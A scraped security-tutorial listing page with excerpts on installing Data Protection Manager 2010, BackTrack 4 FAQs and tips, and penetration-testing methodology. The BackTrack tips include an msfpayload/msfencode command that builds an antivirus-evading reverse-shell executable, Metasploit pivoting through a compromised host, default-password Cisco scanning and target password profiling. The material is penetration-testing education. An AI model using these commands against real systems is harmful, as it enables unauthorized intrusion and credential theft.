Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-installing-data-protection-manager-2010
Packt
01 Jun 2011
6 min read
Save for later

Installing Data Protection Manager 2010

Packt
01 Jun 2011
6 min read
With the DPM upgrade you will face some of the same issues as with the installation such as what are the prerequisites? is your operating system patched? and is DPM 2007 fully patched and ready for the upgrade? This article will walk you through each step of the DPM installation process during the first half and the DPM 2007 to DPM 2010 upgrade in the second half. After reading this article you should know what to look for when working through the prerequisites and requirements. The goal is to ensure that your install or upgrade goes smoothly. Prerequisites In this section we will jump right into the prerequisites for DPM and how to install them as well as the two different ways to install DPM. We will also go through the DPM 2007 to DPM 2010 upgrade process. We will first visit the hardware and software requirements, and a pre-install that is needed before you are able to actually install DPM 2010. Hardware requirements DPM 2010 requires a processor of 1 GHz (dual-core or faster), 4 GB of RAM or higher, the page file should be set to 1.5 or 2 times the amount of RAM on the computer. The DPM disk space requirements are as follows: DPM installation location needs 3 GB free Database file drive needs 900 MB free System drive needs 1 GB free Disk space for protected data should be 2.5 to 3 times the size of the protected data DPM also needs to be on a dedicated, single purpose computer. Software requirements DPM has requirements of both the operating system as well as software that needs to be on the server before DPM can be installed. Let's take a look at what these requirements are. Operating system DPM 2007 can be installed on both a 32-bit and an x64-bit operating systems. However, DPM 2010 is only supported on an x64-bit operating systems. DPM can be installed on a Windows Server 2008 and Windows Server 2008 R2. It is recommended that you install DPM 2010 on Windows Server 2008 R2. DPM can be deployed in a Windows Server 2008, Windows Server 2008 R2, or Windows Server 2003 Active Directory domain. Be sure to launch the Windows update and completely patch the server before you start the DPM installation, no matter what operating system you decide to use. If you end up using Windows 2008 Server for your DPM deployment you will need to install some hotfixes before you start the DPM installation. The hotfixes are as follows: FIX: You are prompted to format the volume when a formatted volume is mounted on a NTFS folder that is located on a computer that is running Windows Server 2008 or Windows Vista (KB971254). Dynamic disks are marked as "Invalid" on a computer that is running Windows Server 2008 or Windows Vista. When you bring the disks online, take the disks offline, or restart the computer if Data Protection Manager is installed (KB962975). An application or service that uses a file system filter driver may experience function failure on a computer that is running Windows Vista, Windows Server 2003, or Windows Server 2008 (KB975759). Software By default, DPM will install any software prerequisites automatically if it is not enabled or installed. Sometimes these software prerequisites might fail during the DPM setup. If they do, you can install these manually. Visit the Microsoft TechNet site for detailed information on installing the software prerequisites. The following is a list of the software that DPM requires before it can be installed: Microsoft .NET Framework 3.5 with Service Pack 1 (SP1) Microsoft Visual C++ 2008 Redistributable Windows PowerShell 2.0 Windows Installer 4.5 or later versions Windows Single Instance Store (SIS) Microsoft Application Error Reporting NOTE: It is recommended that you manually install Single Instance Store on your server before you even begin the DPM 2010 installation. We shall see a step by step installation along with a detailed explanation of Single Instance Store. User privilege requirement The server that you plan to install DPM on must be joined to a domain before you install the DPM software. In order to join the server to the domain you need to have at least domain administrative privileges. You also need to have administrative privileges on the local server to install the DPM software. Restrictions DPM has to be installed on a dedicated server. It is best to make sure that DPM is the only server role running on the server you use for it. You will run into issues if you try to install DPM on a server with other roles on it. The following are the restrictions you need to pay attention to when installing DPM: DPM should not be installed on a domain controller (not recommended) DPM cannot be installed on an Exchange server DPM cannot be installed on a server with System Center Operations Manager installed on it The server you install on cannot be a node in a cluster There is one exception—you can install DPM on a domain controller and make it work but this is not supported by Microsoft. Single Instance Store Before you install DPM on your server, it is important to install a technology called Single Instance Store (SIS). SIS will ensure you get the maximum performance out of your disk space and reduce bandwidth needs on DPM. SIS is a technology that keeps the overhead of handling duplicate files low. This is often referred to as de-duplication. SIS is used to eliminate data duplication by storing only one copy of files on backup storage media. SIS is used in storage, mail, and backup solutions such as DPM. SIS helps to lower the costs of bandwidth when copying data across a network as well as needed storage space. Microsoft has used a single installation store in Exchange since version 4.0. SIS searches a hard disk and identifies duplicate files. SIS then saves only one copy of the files to a central location such as a DPM storage pool. SIS will then replace other copies of the files with pointers that direct you to the copy of the files the SIS repository already has stored. Installing Single Instance Store (SIS) The following procedure walks you through the steps required to install SIS: Click on Start and then click on Run. In the Run dialog box, type CMD.exe and press OK: At the command prompt type the following: start /wait ocsetup.exe SIS-Limited /quiet /norestart And then press Enter. (Move the mouse over the image to enlarge it.) Restart the server. To ensure the installation of SIS went okay, check for the existence of the SIS registry key. Click on Start, then click Run. In the Run dialog box, type regedit and press OK. Navigate to HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices SIS: If the SIS key is shown (as in the screenshot) in the registry it would mean that Single Instance Store (SIS) is installed properly and you can be sure to get the maximum performance out of your disk space on the DPM server.
Read more
  • 0
  • 0
  • 10231

article-image-overview-data-protection-manager-2010
Packt
30 May 2011
9 min read
Save for later

Overview of Data Protection Manager 2010

Packt
30 May 2011
9 min read
  Microsoft Data Protection Manager 2010 A practical step-by-step guide to planning deployment, installation, configuration, and troubleshooting of Data Protection Manager 2010         Read more about this book       (For more resources on Microsoft, see here.) DPM structure In this section we will look at the DPM file structure in order to have a better understanding of where DPM stores its components. We will also look at important processes that DPM runs and what they are used for. There will be some hints and tips that you should know about that will be useful when administering DPM. DPM file locations It is important to know not only how DPM operates, but also to know the structure that is underneath the application. Understanding the structure of where the DPM components are will help you with administering and troubleshooting DPM if the need arises. The following are some important locations: The DPM database backups are stored in the following location. Also when you make backup shadow copies for the replicas these will be stored in this directory. You would make backup show copies of your replicas if you were archiving them using a third-party backup solution: C:Program FilesMicrosoft DPMDPMVolumesShadowCopyDatabase Backups The following directory is where DPM is installed: C:Program FilesMicrosoft DPM The following directory contains PowerShell scripts that come with DPM. There are many scripts that can be used for performing common DPM tasks. C:Program FilesMicrosoft DPMDPMbin The following folder contains the database and files for SQL reporting services: C:Program FilesMicrosoft DPMSQL The following directory contains the SQL DPM database. MDF and LDF files: C:Program FilesMicrosoft DPMDPMDPMDB The following directory stores shadow copy volumes that are recovery points for a data source. These essentially are the changed blocks of VSS (Volume Shadow Copy Service) (Shadow Copy). C:Program FilesMicrosoft DPMDPMVolumesDiffArea The following folder contains mounted replica volumes. Mounted replica volumes are essentially pointers for every protected data object that points to the partition in a DPM storage pool. Think of these mounted replica points as a map from DPM to the protected data on the hard drives where the actual protected data lives. C:Program FilesMicrosoft DPMDPMVolumesReplica DPM processes We are now going to explore DPM processes. The executable files for these are all located in C:Program FilesMicrosoft DPMDPMbin. You can view these processes in Windows Task Manager and they show up in Windows Services as well: The following screenshot shows the DPM services as they appear in Windows Services: We will look at what each of these processes are and what they do. We will also look at the processes that have an impact on the performance of your DPM server. The processes are as follows: DPMAMService.exe: In Windows Services this is listed as the DPM AccessManager Service. This manages access to DPM. DpmWriter.exe: This is a service as well, so you will see it on the services list. This service is used for archiving. It manages the backup shadow copies or replicas, backups of report databases, as well as DPM backups. Msdpm.exe: The DPM service is the core component of DPM. The DPM service manages all core DPM operations, including replica creation, synchronization, and recovery point creation. This service implements and manages synchronization and shadow copy creation for protected file servers. DPMLA.exe: This is the DPM Library Agent Service. DPMRA.exe: This is the DPM Replication Agent. It helps to back up and recover file and application data to DPM. Dpmac.exe: This is known as the DPM Agent Coordinator Service. This manages the installations, uninstallations, and upgrades of DPM protection agents on remote computers that you need to protect. DPM processes that impact DPM performance The Msdpm.exe, MsDpmProtectionAgent.exe, Microsoft$DPM$Acct.exe, and mmc.exe processes take a toll on DPM performance. mmc.exe is a standard Windows service. "MMC" stands for Microsoft Management Console application and is used to display various management plug-ins. Not all but a good amount of Microsoft server applications run in the MMC such as Exchange, ISA, IIS, System Center, and the Microsoft Server Manager. The DPM Administrator Console runs in an MMC as well. mmc.exe can cause high memory usage. The best way to ensure that this process does not overload your memory is to close the DPM Administrator Console when not using it. MsDpmProtectionAgent.exe is the DPM Protection Agent service and affects both CPU and memory usage when DPM jobs and consistency checks are run. There is nothing you can do to get the usage down for this service. You just need to be aware of this and try not to schedule any other resource intensive applications such as antivirus scans at the same time as DPM jobs or consistency checks. Mspdpm.exe is a service that runs synchronization and shadow copy creations as stated previously. Like MsDpmProtectionAgent.exe, Mspdpm.exe also affects CPU and memory usage when running synchronizations and shadow copies. Like MsDpmProtectionAgent.exe there is nothing you can do to the Mspdpm. exe service to reduce memory and CPU usage. Just make sure to keep the system clear of resource intensive applications when the Mspdpm.exe is running jobs. If you are running a local SQL instance for your DPM deployment you will notice a Microsoft$DPM$Acct.exe process. The SQL Server and SQL Agent services use a Microsoft$DPM$Acct account. This normally runs on a high level. This service reserves part of your system's memory for cache. If the system memory goes low, the Microsoft$DPM$Acct.exe process will let go of the memory cache it has reserved. Important DPM terms In this section you will learn some important terms used commonly in DPM. You will need to understand these terms as you begin to administer DPM on a regular basis. You can read the full list of terms at this site: http://technet.microsoft.com/en-us/library/bb795543.aspx We group the terms in a way that each group relates to an area of DPM. The following are some important terms: Bare metal recovery: This is a restore technique that allows one to restore a complete system onto bare metal, without any requirements, to the previous hardware. This allows restoring to dissimilar hardware. Change journal: A feature that tracks changes to NTFS (New Technology File System) volumes, including additions, deletions, and modifications. The change journal exists on the volume as a sparse file. Sparse files are used to make disk space usage more efficient in NTFS. A sparse file allocates disk space only when it is needed. This allows files to be created even when there is insufficient space on a hard drive. These files contain zeroes instead of disk blocks. Consistency check: The process by which DPM checks for and corrects inconsistencies between a protected data source and its replica. A consistency check is only performed when normal mechanisms for recording changes to protected data, and for applying those changes to replicas, have been interrupted. Express full backup: A synchronization operation in which the protection agent transfers a snapshot of all the blocks that have changed since the previous express full backup (or initial replica creation, for the first express full backup). Shadow copy: A point-in-time copy of files and folders that is stored on the DPM server. Shadow copies are sometimes referred to as snapshots. Shadow copy client software: Client software that enables an end-user to independently recover data by retrieving a shadow copy. Replica: A complete copy of the protected data on a single volume, database, or storage group. Each member of a protection group is associated with a replica on the DPM server. Replica creation: The process by which a full copy of data sources, selected for inclusion in a protection group, is transferred to the DPM storage pool. The replica can be created over the network from data on the protected computer or from a tape backup system. Replica creation is an initialization process that is performed for each data source when the data source is added to a protection group. Replica volume: A volume on the DPM server that contains the replica for a protected data source. Custom volume: A volume that is not in the DPM storage pool and is specified to store the replica and recovery points for a protection group member. Dismount: To remove a removable tape or disc from a drive. DPM Alerts log: A log that stores DPM alerts as Windows events so that the alerts can be displayed in Microsoft System Center Operations Manager (SCOM). DPMDB.mdf: The filename of the DPM database, the SQL Server database that stores DPM settings and configuration information. DPMDBReaders group: A group, created during DPM installation, that contains all accounts that have read-only access to the DPM database. The DPMReport account is a member of this group. DPMReport account: The account that the Web and NT services of SQL Server Reporting Services use to access the DPM database. This account is created when an administrator configures DPM reporting. MICROSOFT$DPM$: The name that the DPM setup assigns to the SQL Server instance used by DPM. Microsoft$DPMWriter$ account: The low-privilege account under which DPM runs the DPM Writer service. This account is created during the DPM installation. MSDPMTrustedMachines group: A group that contains the domain accounts for computers that are authorized to communicate with the DPM server. DPM uses this group to ensure that only computers that have the DPM protection agent installed from a specific DPM server can respond to calls from that server. Protection configuration: The collection of settings that is common to a protection group; specifically, the protection group name, disk allocations, replica creation method, and on-the-wire compression. Protection group: A collection of data sources that share the same protection configuration. Protection group member: A data source within a protection group. Protected computer: A computer that contains data sources that are protection group members. Synchronization: The process by which DPM transfers changes from the protected computer to the DPM server, and applies the changes to the replica of the protected volume. Recovery goals: The retention range, data loss tolerance, and frequency of recovery points for protected data. Recovery collection: The aggregate of all recovery jobs associated with a single recovery operation. Recovery point: The date and time of a previous version of a data source that is available for recovery from media that is managed by DPM. Report database: The SQL Server database that stores DPM reporting information (ReportServer.mdf). ReportServer.mdf: In DPM, the filename for the report database—a SQL Server database that stores reporting information. Retention range: Duration of time for which the data should be available for recovery.
Read more
  • 0
  • 0
  • 13140

article-image-faqs-backtrack-4
Packt
26 May 2011
8 min read
Save for later

FAQs on BackTrack 4

Packt
26 May 2011
8 min read
BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Q: Which version of Backtrack is to be chosen? A: On the BackTrack website (http://www.backtrack-linux.org/downloads/) or using third-party mirrors like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/), you will find two different formats of BackTrack version 4 (recently BackTrack 5 is out and hence you may not find version 4 on the official site but the mirror sites like http://mirrors.rit.edu/backtrack/ OR ftp://mirror.switch.ch/mirror/backtrack/ still provide it). One is formatted in ISO image file. You can use this file format if you want to burn it to a DVD, USB, Memory Cards (SSD, SDHC, SDXC, etc) or want to install BackTrack directly to your machine. The second file format is VMWare image. If you want to use BackTrack in a virtual environment, you might want to use this image to speed up the installation and configuration.   Q: What is Portable BackTrack? A: You can also install BackTrack to a USB flash disk, we call this method Portable BackTrack. After you install it to the USB flash disk, you can easily boot up into BackTrack from any machine provided with USB port. The key advantage of this method compared to the Live DVD is that you can permanently save changes to the USB flash disk. When compared to the hard disk installation, this method is more portable and convenient. To create a portable BackTrack, you can use several tools including UNetbootin (http://unetbootin.sourceforge.net), LinuxLive USB Creator (http://www.linuxliveusb.com) and LiveUSB MultiBoot (http://liveusb.info/dotclear/). These tools are available for Windows, Linux/UNIX, and Mac operating system.   Q: How to install BackTrack in a dual-boot environment? A: One of the resources that describe how to install BackTrack with other operating systems such as Windows XP can be found at: http://www.backtrack-linux.org/tutorials/dual-boot-install/.   Q: What types of penetration testing tools are available under Backtrack 4? A: BackTrack 4 comes with number of security tools that can be used during the penetration testing process. These are categorized into the following: Information gathering: This category contains tools that can be used to collect information regarding target DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is usually gathered from the publicly available resources such as Internet, without touching the target environment. Network mapping: This category contains tools that can be used to assess the live status of the target host, fingerprint the operating system and, probe and map the applications/services through various port scanning techniques. Vulnerability identification: In this category you will find different set of tools to scan for vulnerabilities in various IT technologies. It also contains tools to carry out manual and automated fuzzy testing and analyzing SMB and SNMP protocols. Web application analysis: This category contains tools that can be used to assess the security of web servers and web applications. Radio network analysis: To audit wireless networks, Bluetooth and radio-frequency identification (RFID) technologies, you can use the tools in this category. Penetration: This category contains tools that can be used to exploit the vulnerabilities found in the target environment. Privilege escalation: After exploiting the vulnerabilities and gaining access to the target system, you can use the tools in this category to escalate your privileges to the highest level. Maintaining access: Tools in this category will be able to help you in maintaining access to the target machine. Note that, you might need to escalate your privileges before attempting to install any of these tools on the compromised host. Voice over IP (VOIP): In order to analyze the security of VOIP technology you can utilize the tools in this category. BackTrack 4 also contains tools that can be used for: Digital forensics: In this category you can find several tools that can be used to perform digital forensics and investigation, such as acquiring hard disk image, carving files, and analyzing disk archive. Some practical forensic procedures require you to mount the hard drive in question and swap the files in read-only mode to preserve evidence integrity. Reverse engineering: This category contains tools that can be used to debug, decompile and disassemble the executable file.   Q: Do I have to install additional tools with BackTrack 4? A: Although BackTrack 4 comes preloaded with so many security tools, however there are situations where you may need to add additional tools or packages because: It is not included with the default BackTrack 4 installation. You want to have the latest version of a particular tool which is not available in the repository. Our first suggestion is to try search the package in the software repository. If you find the package in the repository, please use that package, but if you can't find it, then you can get the software package from the author's website and install it by yourself. However, the prior method is highly recommended to avoid any installation and configuration conflicts. You can search for tools in the BackTrack repository using the apt-cache search command. However, if you can't find the package in the repository and you are sure that the package will not cause any problems later on, you can install the package by yourself.   Q: Why do we use the WebSecurify tool? A: WebSecurify is a web security testing environment that can be used to find vulnerabilities in the web applications. It can be used to check for the following vulnerabilities: SQL injection Local and remote file include Cross-site scripting Cross-site request forgery Information disclosure Session security flaws WebSecurify is readily available from the BackTrack repository. To install it you can use the apt-get command: # apt-get install websecurify You can search for tools in the BackTrack repository using the apt-cache search command.   Q: What are the types of penetration testing? A: Black-box testing: The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. White-box testing: The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. Grey-Box testing: The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier.   Q: What is the difference between vulnerability assessment and penetration testing? A: A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. Penetration testing is an expensive service when compared to vulnerability assessment   Q: Which class of vulnerability is considered to be the worst to resolve? A: "Design vulnerability" takes a developer to derive the specifications based on the security requirements and address its implementation securely. Thus, it takes more time and effort to resolve the issue when compared to other classes of vulnerability.   Q: Which OSSTMM test type follows the rules of Penetration Testing? A: Double blind testing   Q: What is an Application Layer? A: Layer-7 of the Open Systems Interconnection (OSI) model is known as the “Application Layer”. The key function of this model is to provide a standardized way of communication across heterogeneous networks. A model is divided into seven logical layers, namely, Physical, Data link, Network, Transport, Session, Presentation, and Application. The basic functionality of the application layer is to provide network services to user applications. More information on this can be obtained from: http://en.wikipedia.org/wiki/OSI_model.   Q: What are the steps for BackTrack testing methodology? A: The illustration below shows the BackTrack testing process. Summary In this article we took a look at some of the frequently asked questions on BackTrack 4 so that we can use it more efficiently Further resources on this subject: Tips and Tricks on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 8987

article-image-tips-and-tricks-backtrack-4
Packt
26 May 2011
7 min read
Save for later

Tips and Tricks on BackTrack 4

Packt
26 May 2011
7 min read
  BackTrack 4: Assuring Security by Penetration Testing Master the art of penetration testing with BackTrack         Read more about this book       (For more resources on this subject, see here.) Updating the kernel The update process is enough for updating the software applications. However, sometimes you may want to update your kernel, because your existing kernel doesn't support your new device. Please remember that because the kernel is the heart of the operating system, failure to upgrade may cause your BackTrack to be unbootable. You need to make a backup of your kernel and configuration. You should ONLY update your kernel with the one made available by the BackTrack developers. This Linux kernel is modified to make certain "features" available to the BackTrack users and updating with other kernel versions could disable those features.   Multiple Customized installations One of the drawbacks we found while using BackTrack 4 is that you need to perform a big upgrade (300MB to download) after you've installed it from the ISO or from the VMWare image provided. If you have one machine and a high speed Internet connection, there's nothing much to worry about. However, imagine installing BackTrack 4 in several machines, in several locations, with a slow internet connection. The solution to this problem is by creating an ISO image with all the upgrades already installed. If you want to install BackTrack 4, you can just install it from the newly created ISO image. You won't have to download the big upgrade again. While for the VMWare image, you can solve the problem by doing the upgrade in the virtual image, then copying that updated virtual image to be used in the new VMWare installation.   Efficient methodology Combining the power of both methodologies, Open Source Security Testing Methodology Manual (OSSTMM) and Information Systems Security Assessment Framework (ISSAF) does provide sufficient knowledge base to assess the security of an enterprise environment efficiently.   Can't find the dnsmap program In our testing, the dnsmap-bulk script is not working because it can't find the dnsmap program. To fix it, you need to define the location of the dnsmap executable. Make sure you are in the dnsmap directory (/pentest/enumeration/dns/dnsmap). Edit the dnsmap-bulk.sh file using nano text editor and change the following: dnsmap $i elif [[ $# -eq 2 ]] then dnsmap $i -r $2 to ./dnsmap $i elif [[ $# -eq 2 ]] then ./dnsmap $i -r $2 and save your changes.   fierce Version Currently, the fierce Version 1 included with BackTrack 4 is no longer maintained by the author (Rsnake). He has suggested using fierce Version 2 that is still actively maintained by Jabra. fierce Version 2 is a rewrite of fierce Version 1. It also has several new features such as virtual host detection, subdomain and extension bruteforcing, template based output system, and XML support to integrate with Nmap. Since fierce Version 2 is not released yet and there is no BackTrack package for it, you need to get it from the development server by issuing the Subversion check out command: #svn co https://svn.assembla.com/svn/fierce/fierce2/trunk/fierce2/ Make sure you are in the /pentest/enumeration directory first before issuing the above command. You may need to install several Perl modules before you can use fierce v2 correctly.   Relationship between "Vulnerability" and "Exploit" A vulnerability is a security weakness found in the system which can be used by the attacker to perform unauthorized operations, while the exploit is a piece of code (proof-of-concept or PoC) written to take advantage of that vulnerability or bug in an automated fashion.   CISCO Privilege modes There are 16 different privilege modes available for the Cisco devices, ranging from 0 (most restricted level) to 15 (least restricted level). All the accounts created should have been configured to work under the specific privilege level. More information on this is available at http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.html.   Cisco Passwd Scanner The Cisco Passwd Scanner has been developed to scan the whole bunch of IP addresses in a specific network class. This class can be represented as A, B, or C in terms of network computing. Each class has it own definition for a number of hosts to be scanned. The tool is much faster and efficient in handling multiple threads in a single instance. It discovers those Cisco devices carrying default telnet password "cisco". We have found a number of Cisco devices vulnerable to default telnet password "cisco".   Common User Passwords Profiler (CUPP) As a professional penetration tester you may find a situation where you hold the target's personal information but are unable to retrieve or socially engineer his e-mail account credentials due to certain variable conditions, such as, the target does not use the Internet often, doesn't like to talk to strangers on the phone, and may be too paranoid to open unknown e-mails. This all comes to guessing and breaking the password based on various password cracking techniques (dictionary or brute force method). CUPP is purely designed to generate a list of common passwords by profiling the target name, birthday, nickname, family member's information, pet name, company, lifestyle patterns, likes, dislikes, interests, passions, and hobbies. This activity serves as crucial input to the dictionary-based attack method while attempting to crack the target's e-mail account password.   Extract particular information from the exploits list Using the power of bash commands we can manipulate the output of any text file in order to retrieve meaningful data. This can be accomplished by typing in cat files.csv |grep '"' |cut -d";" -f3 on your console. It will extract the list of exploit titles from a files.csv. To learn the basic shell commands please refer to an online source at: http://tldp.org/LDP/abs/html/index.html.   "inline" and "stager" type payload An inline payload is a single self-contained shell code that is to be executed with one instance of an exploit. While the stager payload creates a communication channel between the attacker and victim machine to read-off the rest of the staging shell code to perform the specific task, it is often common practice to choose stager payloads because they are much smaller in size than inline payloads.   Extending attack landscape by gaining deeper access to the target's network that is inaccessible from outside Metasploit provides a capability to view and add new routes to the destination network using the "route add targetSubnet targetSubnetMask SessionId" command (for example, route add 10.2.4.0 255.255.255.0 1). The "SessionId" is pointing to the existing meterpreter session (also called gateway) created after successful exploitation. The "targetSubnet" is another network address (also called dual homed Ethernet IP-address) attached to our compromised host. Once you set a metasploit to route all the traffic through a compromised host session, we are then ready to penetrate further into a network which is normally non-routable from our side. This terminology is commonly known as Pivoting or Foot-holding.   Evading Antivirus Protection Using Metasploit Using a tool called msfencode located at /pentest/exploits/framework3, we can generate a self-protected executable file with encoded payload. This should be parallel to the msfpayload file generation process. A "raw" output from Msfpayload will be piped into Msfencode to use specific encoding technique before outputting the final binary. For instance, execute ./msfpayload windows/shell/reverse_tcp LHOST=192.168.0.3 LPORT=32323 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/tictoe.exe to generate an encoded version of a reverse shell executable file. We strongly suggest you to use the "stager" type payloads instead of "inline" payloads, as they have a greater probability of success in bypassing major malware defenses due to their indefinite code signatures.   Stunnel version 3 BackTrack also comes with Stunnel version 3. The difference with Stunnel version 4 is that the version 4 uses a configuration file. If you want to run the version 3 style command-line arguments, you can call the command stunnel or stunnel3 with all of the needed arguments. Summary In this article we will take a look at some tips and tricks to make the best use of BackTrack OS. Further resources on this subject: FAQs on BackTrack 4 [Article] BackTrack 4: Target Scoping [Article] BackTrack 4: Security with Penetration Testing Methodology [Article] Blocking Common Attacks using ModSecurity 2.5 [Article] Telecommunications and Network Security Concepts for CISSP Exam [Article] Preventing SQL Injection Attacks on your Joomla Websites [Article]
Read more
  • 0
  • 0
  • 7840

article-image-backtrack-4-penetration-testing-methodologies
Packt
20 Apr 2011
14 min read
Save for later

BackTrack 4: Penetration testing methodologies

Packt
20 Apr 2011
14 min read
A robust penetration testing methodology needs a roadmap. This will provide practical ideas and proven practices which should be handled with great care in order to assess the system security correctly. Let's take a look at what this methodology looks like. It will help ensure you're using BackTrack effectively and that you're tests are thorough and reliable. Penetration testing can be carried out independently or as a part of an IT security risk management process that may be incorporated into a regular development lifecycle (for example, Microsoft SDLC). It is vital to notice that the security of a product not only depends on the factors relating to the IT environment, but also relies on product specific security's best practices. This involves implementation of appropriate security requirements, performing risk analysis, threat modeling, code reviews, and operational security measurement. PenTesting is considered to be the last and most aggressive form of security assessment handled by qualified professionals with or without prior knowledge of a system under examination. It can be used to assess all the IT infrastructure components including applications, network devices, operating systems, communication medium, physical security, and human psychology. The output of penetration testing usually contains a report which is divided into several sections addressing the weaknesses found in the current state of a system following their countermeasures and recommendations. Thus, the use of a methodological process provides extensive benefits to the pentester to understand and critically analyze the integrity of current defenses during each stage of the testing process. Different types of penetration testing Although there are different types of penetration testing, the two most general approaches that are widely accepted by the industry are Black-Box and White-Box. These approaches will be discussed in the following sections. Black-box testing The black-box approach is also known as external testing. While applying this approach, the security auditor will be assessing the network infrastructure from a remote location and will not be aware of any internal technologies deployed by the concerning organization. By employing the number of real world hacker techniques and following through organized test phases, it may reveal some known and unknown set of vulnerabilities which may otherwise exist on the network. An auditor dealing with black-box testing is also known as black-hat. It is important for an auditor to understand and classify these vulnerabilities according to their level of risk (low, medium, or high). The risk in general can be measured according to the threat imposed by the vulnerability and the financial loss that would have occurred following a successful penetration. An ideal penetration tester would undermine any possible information that could lead him to compromise his target. Once the test process is completed, a report is generated with all the necessary information regarding the target security assessment, categorizing and translating the identified risks into business context. White-box testing The white-box approach is also referred to as internal testing. An auditor involved in this kind of penetration testing process should be aware of all the internal and underlying technologies used by the target environment. Hence, it opens a wide gate for an auditor to view and critically evaluate the security vulnerabilities with minimum possible efforts. An auditor engaged with white-box testing is also known as white-hat. It does bring more value to the organization as compared to the blackbox approach in the sense that it will eliminate any internal security issues lying at the target infrastructure environment, thus, making it more tightened for malicious adversary to infiltrate from the outside. The number of steps involved in white-box testing is a bit more similar to that of black-box, except the use of the target scoping, information gathering, and identification phases can be excluded. Moreover, the white-box approach can easily be integrated into a regular development lifecycle to eradicate any possible security issues at its early stage before they get disclosed and exploited by intruders. The time and cost required to find and resolve the security vulnerabilities is comparably less than the black-box approach. The combination of both types of penetration testing provides a powerful insight for internal and external security viewpoints. This combination is known as Grey-Box testing, and the auditor engaged with gray-box testing is also known as grey-hat. The key benefit in devising and practicing a gray-box approach is a set of advantages posed by both approaches mentioned earlier. However, it does require an auditor with limited knowledge of an internal system to choose the best way to assess its overall security. On the other side, the external testing scenarios geared by the graybox approach are similar to that of the black-box approach itself, but can help in making better decisions and test choices because the auditor is informed and aware of the underlying technology. Vulnerability assessment versus penetration testing Since the exponential growth of an IT security industry, there are always an intensive number of diversities found in understanding and practicing the correct terminology for security assessment. This involves commercial grade companies and non-commercial organizations who always misinterpret the term while contracting for the specific type of security assessment. For this obvious reason, we decided to include a brief description on vulnerability assessment and differentiate its core features with penetration testing. Vulnerability assessment is a process for assessing the internal and external security controls by identifying the threats that pose serious exposure to the organizations assets. This technical infrastructure evaluation not only points the risks in the existing defenses but also recommends and prioritizes the remediation strategies. The internal vulnerability assessment provides an assurance for securing the internal systems, while the external vulnerability assessment demonstrates the security of the perimeter defenses. In both testing criteria, each asset on the network is rigorously tested against multiple attack vectors to identify unattended threats and quantify the reactive measures. Depending on the type of assessment being carried out, a unique set of testing process, tools, and techniques are followed to detect and identify vulnerabilities in the information assets in an automated fashion. This can be achieved by using an integrated vulnerability management platform that manages an up-to-date vulnerabilities database and is capable of testing different types of network devices while maintaining the integrity of configuration and change management. A key difference between vulnerability assessment and penetration testing is that penetration testing goes beyond the level of identifying vulnerabilities and hooks into the process of exploitation, privilege escalation, and maintaining access to the target system. On the other hand, vulnerability assessment provides a broad view of any existing flaws in the system without measuring the impact of these flaws to the system under consideration. Another major difference between both of these terms is that the penetration testing is considerably more intrusive than vulnerability assessment and aggressively applies all the technical methods to exploit the live production environment. However, the vulnerability assessment process carefully identifies and quantifies all the vulnerabilities in a non-invasive manner. This perception of an industry, while dealing with both of these assessment types, may confuse and overlap the terms interchangeably, which is absolutely wrong. A qualified consultant always makes an exception to workout the best type of assessment based on the client's business requirement rather than misleading them from one over the other. It is also a duty of the contracting party to look into the core details of the selected security assessment program before taking any final decision. Penetration testing is an expensive service when compared to vulnerability assessment. Security testing methodologies There have been various open source methodologies introduced to address security assessment needs. Using these assessment methodologies, one can easily pass the time-critical and challenging task of assessing the system security depending on its size and complexity. Some of these methodologies focus on the technical aspect of security testing, while others focus on managerial criteria, and very few address both sides. The basic idea behind formalizing these methodologies with your assessment is to execute different types of tests step-by-step in order to judge the security of a system accurately. Therefore, we have introduced four such well-known security assessment methodologies to provide an extended view of assessing the network and application security by highlighting their key features and benefits. These include: Open Source Security Testing Methodology Manual (OSSTMM) Information Systems Security Assessment Framework (ISSAF) Open Web Application Security Project (OWASP) Top Ten Web Application Security Consortium Threat Classification (WASC-TC) All of these testing frameworks and methodologies will assist the security professionals to choose the best strategy that could fit into their client's requirements and qualify the suitable testing prototype. The first two provide general guidelines and methods adhering security testing for almost any information assets. The last two mainly deal with the assessment of an application security domain. It is, however, important to note that the security in itself is an on-going process. Any minor change in the target environment can affect the whole process of security testing and may introduce errors in the final results. Thus, before complementing any of the above testing methods, the integrity of the target environment should be assured. Additionally, adapting any single methodology does not necessarily provide a complete picture of the risk assessment process. Hence, it is left up to the security auditor to select the best strategy that can 